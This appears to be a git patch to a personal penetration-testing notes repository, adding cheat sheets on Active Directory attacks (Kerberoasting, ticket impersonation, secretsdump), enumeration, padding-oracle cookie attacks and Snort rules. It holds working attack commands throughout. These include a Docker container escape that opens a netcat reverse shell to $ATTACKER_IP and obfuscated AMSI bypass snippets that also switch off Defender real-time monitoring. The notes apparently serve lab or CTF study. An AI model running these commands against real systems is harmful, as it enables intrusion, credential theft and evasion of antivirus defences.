From fdb8bacf6d19b3dbb6839ff4cec3a56709b151eb Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 19 Mar 2022 23:39:17 +0100 Subject: [PATCH] bump --- .gitmodules | 9 ++ enumeration/Subrake | 1 + enumeration/docs/dns.md | 11 ++ enumeration/docs/kerberoast.md | 37 ++++- enumeration/docs/ldap.md | 10 +- enumeration/docs/rpcclient.md | 11 ++ exploit/binaries/ret2libc.md | 6 +- exploit/linux/dirty_pipe/dirty_pipe.md | 15 ++ exploit/padding/PadBuster | 1 + exploit/padding/padbuster.md | 16 +++ exploit/python/pickle.md | 5 + hashes/exrex | 1 + hashes/generate_wordlists.md | 2 + misc/level3_hypervisor/docker_sec/docker.md | 4 +- misc/snort.md | 134 ++++++++++++++++++ .../docs/windows/antivirus_evasion.md | 72 ++++++++-- 16 files changed, 315 insertions(+), 20 deletions(-) create mode 160000 enumeration/Subrake create mode 100644 enumeration/docs/dns.md create mode 100644 enumeration/docs/rpcclient.md create mode 100644 exploit/linux/dirty_pipe/dirty_pipe.md create mode 160000 exploit/padding/PadBuster create mode 100644 exploit/padding/padbuster.md create mode 160000 hashes/exrex create mode 100644 misc/snort.md diff --git a/.gitmodules b/.gitmodules index be02fd9..62bdf96 100644 --- a/.gitmodules +++ b/.gitmodules @@ -160,3 +160,12 @@ [submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"] path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git +[submodule "hashes/exrex"] + path = hashes/exrex + url = https://github.com/asciimoo/exrex.git +[submodule "exploit/padding/PadBuster"] + path = exploit/padding/PadBuster + url = https://github.com/AonCyberLabs/PadBuster.git +[submodule "enumeration/Subrake"] + path = enumeration/Subrake + url = https://github.com/hash3liZer/Subrake.git diff --git a/enumeration/Subrake b/enumeration/Subrake new file mode 160000 index 0000000..08b2a25 --- /dev/null +++ b/enumeration/Subrake @@ -0,0 +1 @@ +Subproject commit 08b2a2509c934d5d9c6256c7dbe14ef26f6ddb6c diff --git a/enumeration/docs/dns.md b/enumeration/docs/dns.md new file mode 100644 index 0000000..ed0c86b --- /dev/null +++ b/enumeration/docs/dns.md @@ -0,0 +1,11 @@ +# DNS + +## Subdomain Enumeration + +* Get all the info via +```sh +dig @$TARGET_DNS $DOMAIN axfr +drill @$TARGET_DNS $DOMAIN axfr +``` + +* [subrake](https://github.com/hash3liZer/Subrake.git) diff --git a/enumeration/docs/kerberoast.md b/enumeration/docs/kerberoast.md index bef379b..463a9cb 100644 --- a/enumeration/docs/kerberoast.md +++ b/enumeration/docs/kerberoast.md @@ -2,12 +2,36 @@ ## Usage +### List users + +```sh +kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST +``` + +### Get Users * Impacket's `GetNPUsers.py` to get Hashes of userlist ```sh GetNPUsers.py -no-pass / -usersfile users.txt -format john -outputfile hashes ``` -* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py` +### Find SPNs + +```sh +GetUserSPNs.py -request /: -dc-ip $TARGET_IP +``` +or +```sh +pyverview get-netuser -u -p -t -d +``` + +### Further Intel + +```sh +findDelegation.py -debug /: -dc-ip $TARGET_IP +``` + +### Check Found Users +* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py` ```sh crackmapexec smb $TARGET_IP -u users.txt -p pass.txt ``` @@ -17,4 +41,15 @@ crackmapexec smb $TARGET_IP -u users.txt -p pass.txt smbpasswd.py @$TARGET_IP -newpass password123 ``` +### Impersonate + +```sh +getST.py -spn / -impersonate Administrator '/:' -dc-ip $TARGET_IP +``` +* Serviceticket is save as `Administrator.ccache` +* `export KRB5CCNAME=Administrator.ccache` +* After that dump secrets +```sh +secretsdump.py -k -no-pass +``` diff --git a/enumeration/docs/ldap.md b/enumeration/docs/ldap.md index 97959c3..f9e7fd8 100644 --- a/enumeration/docs/ldap.md +++ b/enumeration/docs/ldap.md @@ -3,7 +3,15 @@ ## Get Domain ```sh - ldapsearch -x -h $TARGET_IP -s base namingcontexts +ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts +``` +* Use found namingcontexts DC +```sh +ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC= +``` +* Authenticated LDAP Search +```sh +ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC=' -D '\' -W > outfile ``` ## Domain Dump diff --git a/enumeration/docs/rpcclient.md b/enumeration/docs/rpcclient.md new file mode 100644 index 0000000..c3a0307 --- /dev/null +++ b/enumeration/docs/rpcclient.md @@ -0,0 +1,11 @@ +# rpcclient + +```sh +rpcclient -U% $TARGET_IP +``` +* Input commands, attributes count for the current user on the machine +```sh +enumdomusers +enumdomains +enumprivs +``` diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md index 501e132..e4f9de7 100644 --- a/exploit/binaries/ret2libc.md +++ b/exploit/binaries/ret2libc.md @@ -31,7 +31,7 @@ readelf -s /lib32/libc.so.6 | grep system ### Measure the Buffer * With gef - * `create pattern` + * `pattern create` * `run` * Use pattern * `pattern search $` @@ -53,6 +53,10 @@ ROPgadget --binary | grep rdi objdump -d | grep ret ``` +## Automated + +* [xct's ropstar](https://github.com/xct/ropstar.git) + ## Example without ASLR ```python from pwn import * diff --git a/exploit/linux/dirty_pipe/dirty_pipe.md b/exploit/linux/dirty_pipe/dirty_pipe.md new file mode 100644 index 0000000..16e4ed9 --- /dev/null +++ b/exploit/linux/dirty_pipe/dirty_pipe.md @@ -0,0 +1,15 @@ +# CVE-2022-0847 + +* [Max Kellerman's post](https://dirtypipe.cm4all.com/) + +* 5.8 < Vulnerable kernels < 5.10.102 +* If a file can be read, it can be written also. + +## Usage + +* `splice(2)` moves data between files and through pipes without copying between kernel and user adress space +* Anonymous pipes permissions are not checked + * Read only permissions on pages do not matter on a pipe level +* Splice is putting data into the pipe and malicious data afterwards in the same one to overwrite the mem page +* `PIPE_BUF_FLAG_CAN_MERGE` flag has to be activated in order to write back to a file +* Works as long as there is an offset to start of a page in the beginning of the writing diff --git a/exploit/padding/PadBuster b/exploit/padding/PadBuster new file mode 160000 index 0000000..50e4a3e --- /dev/null +++ b/exploit/padding/PadBuster @@ -0,0 +1 @@ +Subproject commit 50e4a3e2bf5dfff5699440b3ebc61ed1b5c49bbe diff --git a/exploit/padding/padbuster.md b/exploit/padding/padbuster.md new file mode 100644 index 0000000..a447b9e --- /dev/null +++ b/exploit/padding/padbuster.md @@ -0,0 +1,16 @@ +# PadBuster + +* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git) + +* Padding Oracle + +## Usage on Cookies + +* Oracle on cookievalue, use website error message of invalid padding +* A high privileged user account can be added as a target +```sh + ./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "" +```sh + ./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "" -plaintext '=' +``` + diff --git a/exploit/python/pickle.md b/exploit/python/pickle.md index 21d3e45..a9de31e 100644 --- a/exploit/python/pickle.md +++ b/exploit/python/pickle.md @@ -14,3 +14,8 @@ x = evil_object() y = pickle.dumps(x) base64.b64encode(y) ``` + +* Dump serialized object via +```python +pickle.dump(SerializedPickle(), open('pickled.out', 'wb') +``` diff --git a/hashes/exrex b/hashes/exrex new file mode 160000 index 0000000..9a66706 --- /dev/null +++ b/hashes/exrex @@ -0,0 +1 @@ +Subproject commit 9a66706e7582a9cf31c4121629c9035e329bbe21 diff --git a/hashes/generate_wordlists.md b/hashes/generate_wordlists.md index 3d5fc8e..40899ab 100644 --- a/hashes/generate_wordlists.md +++ b/hashes/generate_wordlists.md @@ -43,4 +43,6 @@ ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt ``` +# exrex +* Generate all possible outcomes from regex string diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md index 6612c62..d2d05c5 100644 --- a/misc/level3_hypervisor/docker_sec/docker.md +++ b/misc/level3_hypervisor/docker_sec/docker.md @@ -85,14 +85,14 @@ capsh --print * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.) -* Exploit +* Exploit and get a reverse shell to the host via ```sh mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/exploit" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /exploit -echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit +echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit chmod a+x /exploit sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` diff --git a/misc/snort.md b/misc/snort.md new file mode 100644 index 0000000..446ee17 --- /dev/null +++ b/misc/snort.md @@ -0,0 +1,134 @@ +# Snort + +Comprised of __packet decoder__, __pre processor__, __detection engine__, __logging and alerting__, __output and plugins__ + +## Data Aquisition Modules + +* __Pcap__, default +* __Afpacket__, inline mode, IPS +* __Ipq__, uses netfilter on linux +* __Nfq__, inline mode on linux +* __Ipfw__, inline mode on BSD +* __Dump__, test mode + +## Usage + +* Check config, and run tests via +```sh +snort -c -T +``` + + +### Sniffing +| Parameter | Description | ++-----------+-------------+ +| -v | Verbose. Display the TCP/IP output in the console.| +| -d | Display the packet data (payload).| +| -e | Display the link-layer (TCP/IP/UDP/ICMP) headers. | +| -X | Display the full packet details in HEX.| +| -i | Liste on interface | + +### Packet Logger + +* Logged by IP as directory, ports as files inside these dirs +* BPF filter can be used like `tcp port 80` +* Log files can be opened by wireshark or tcpdump + +| Parameter | Description | +|-----------|-------------| +| -l | Logger mode, target log and alert output directory. Default output folder is tcpdump to /var/log/snort.| +| -K ASCII | Log packets in ASCII format | +| -r | Filter dumped logs in Snort | +| -n | Specify the number of packets that will be read | + +### IDS and IPS + +* Output is an alert file along an optional log file + +| Parameter | Description | +|-----------|-------------| +| -c | Defining the configuration file | +| -T | Testing the configuration file | +| -N | Disable logging | +| -D | Background mode | +| -A | Alert modes; __full__: all possible info about alerts, default mode; __fast__ : alert message, timestamp, source and destination IP, port numbers. __console__: Provides fast style alerts on the console screen. __cmg__: CMG style, basic header details with payload in hex and text format. __none__: Disabling alerting | + +* Rules found in `/etc/snort/rules/local.rules` +```sh +alert icmp any any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;) +``` + +### PCAPs + +* `snort -c -r file.pcap -A console -n ` +* `snort -c --pcap-list="file1.pcap file2.pcap" -A console -l .` + + +## Rules + +```sh +snort -c /etc/snort/rules/local.rules -A console +snort -c /etc/snort/rules/local.rules -A full +``` +* Every rule has an IP source and destination, as well as a port for every endpoint +* General, payload and non payload rules + +* Direction of the packet + * `->` to destination + * `<>` bidirectional + +* IDS -> `alert` +* IPS -> `reject` + +` <> (msg: "; ; ;` + +* Actions + * `alert` + * `log` + * `drop` + * `reject` + +* SID rule IDs + * < 100 reserved rules + * 100 - 999,999 rules of the build + * >= 1,000,000 user rules + +* Reference may be a CVE +* Revisions are versionings of the rule + +* Filter address range via CIDR +```sh +alert icmp 192.168.1.0/24 any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;) +``` +* Filter multiple address ranges +```sh +alert icmp [192.168.1.0/24, 10.1.1.0/24] any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;) +``` +* Exlude via `!10.10.0.1` +* Filter via any and ports between 4712 and 8080 +```sh +alert icmp any 4711,8080: <> any any (msg: "TCP Packet Found"; sid: 100001; rev:1;) +``` + +### Detection Rules + +* `/etc/snort/rules/local.rules` +* ASCII or gex mode +```sh +ASCII mode - alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; sid: 100001; rev:1;) +alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"|47 45 54|"; sid: 100001; rev:1;) +``` +* Case insensitiv +```sh +alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; nocase; sid: 100001; rev:1;) +``` +* Fast pattern +```sh +alert tcp any any <> any 80 (msg: "GET Request Found"; content:"GET"; fast_pattern; content:"www"; sid:100001; rev:1;) +``` + +* Non payload detection rules + * TCP flags, `flags: F,S,A,R,P,U` + * Payload size, `dsize:min<>max` + * SameIP, `alert ip any any <> any any (msg: "SAME-IP TEST"; sameip; sid: 100001; rev:1;)` + * Packet IDs, `id: 4711` diff --git a/post_exploitation/docs/windows/antivirus_evasion.md b/post_exploitation/docs/windows/antivirus_evasion.md index 17835ba..ad13e11 100644 --- a/post_exploitation/docs/windows/antivirus_evasion.md +++ b/post_exploitation/docs/windows/antivirus_evasion.md @@ -35,9 +35,26 @@ Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False ``` ## Anti Malware Secure Interface -* https://docs.microsoft.com/en-us/windows/win32/amsi/ -### Return Result Codes +* Powershell .NET runtime detection measure of windows. Scans code before executed. +* https://docs.microsoft.com/en-us/windows/win32/amsi/ +* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions +* https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream +* Integrated inside components + * User Account Control (UAC) + * Powershell + * Windows Script Host (wscript, csrcipt) + * JavaScript and VBScript + * VBA macros +* `System.Management.Automation.dll` + +* Flow +``` + | Win32 API | COM API | AV Provider | +Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan() +``` + +### Return Result/Response Codes ``` AMSI_RESULT_CLEAN = 0 AMSI_RESULT_NOT_DETECTED = 1 @@ -45,27 +62,52 @@ AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384 AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479 AMSI_RESULT_DETECTED = 32768 ``` -### Bypass -* Patching amsi.dll -* Amsi ScanBuffer patch -* Forcing errors + +### PowerShell Downgrade Attack + +* Downgrade Powershell version to 2.0, where no AMSI is implemented +```sh +PowerShell -Version 2 +``` + +* [Unicorn](https://github.com/trustedsec/unicorn) does leverage this + +### Reflection Bypass + +* Varying string concatenation and camelCasing variations of the following string by Matt Graeber * [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) -* PowerShell downgrade -* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git) -* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py) -* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) -* Practical example +```sh +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +``` +or an obfuscated version ```sh [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse Set-MpPreference -DisableRealtimeMonitoring $true ``` -* Varying string concatenation and camelCasing variations of the following string -```sh -[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) -``` + +### AMSI ScanBuffer patch + +* Patching `amsi.dll`, which is loaded at Powershell startup +* AMSI ScanBuffer is delivered to `amsi.dll` + +* Get handle of `amsi.dll` +* Get process address of AmsiScanBuffer +* Modify mem protection of AmsiScanBuffer +* Write opcode to AMSIScanBuffer + +* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py) +* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) + +### Other Bypasses and Tools + +* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git) + +* [amsifail](http://amsi.fail/) generates obfuscated snippets ### Validate + +* [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions * Validate Obfuscation and check which strings trigger AMSI * [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger) ```sh